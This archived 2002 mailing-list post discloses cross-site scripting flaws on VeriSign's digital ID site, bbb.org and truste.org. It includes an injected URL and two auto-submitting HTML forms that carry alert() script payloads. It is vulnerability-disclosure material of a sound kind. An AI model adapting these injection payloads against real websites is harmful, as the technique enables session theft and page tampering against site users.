Vulnerability Development mailing list archives
CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org.
From: Liu Die Yu <liudieyuinchina () yahoo com cn>
Date: 16 Jul 2002 07:37:10 -0000
CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org. ---== *Useful* info==--- [1].digitalid.verisign.com is the *sign* of VeriSign. Unfortunately, it is CSS vulnerable. CODE:URL https://digitalid.verisign.com/cgi-bin/Xquery.exe?Template=&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=9cef871936b857a17a7d8bb1810ac742"><P STYLE="left:expression(eval('alert(\'boop\')'))"> (Passed using MSIE 5.5) [2].www.bbb.org is the body of BBB. Again, CSS vulnerable. CODE:.HTM file ----------cut-here--------- <html> <body> <form NAME="theform" ACTION="http://www.bbb.org/contact/promail.asp" METHOD="POST"> <input type="text" name="username" size="10000" Value=""><SCRIPT>alert("boop");</SCRIPT>"> <input type="submit" value="Submit" name="btnSubmit"> <input type="reset" value="Reset" name="btnReset"> </form> <script> theform.submit(); </script> </BODY> </html> ----------cut-here--------- (Passed using MSIE5.5) [3].www.truste.org is not trustable for CSS at present. CODE:.HTML file -------Cut-here----------- <html> <body> <form name=theform action="http://www.truste.org/cgi-mojo/mojo.cgi" method=POST> <input type="text" name="email" size="12345" value=""">><SCRIPT>alert("boop");</SCRIPT>"> <input type="submit" style='font-size: 12px; font-family:arial,verdana, sans-serif; background-color: #CC9966; color: #000000; font-weight:bold;border-style:groove' value="Signup"> </form> <SCRIPT> theform.submit(); </SCRIPT> </body> </html> -------cut-here---------- (Passed using MSIE5.5) [4].Note:for info on CSS, visit cert.org ---==Contact me==--- email:LiuDieYuInChina () yahoo com cn.NOSPAM:) I am a student in the Xiang Tan University in HN,CN;My handle is Liu Die Yu. Glad to be your friend. ---==fOR FUN==--- Can anyone send a postcard(NOT A BOMB) to me? Postal Address: #B102 Xiang Tan Da Xue,411105,Hu Nan,CHINA ---==Sth serious(but not technical)==--- It is even hard to imagine that these sites, which are important sites for online business, are CSS vulneralbe.I think the security agencies are fooling around.
Current thread:
- CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org. Liu Die Yu (Jul 16)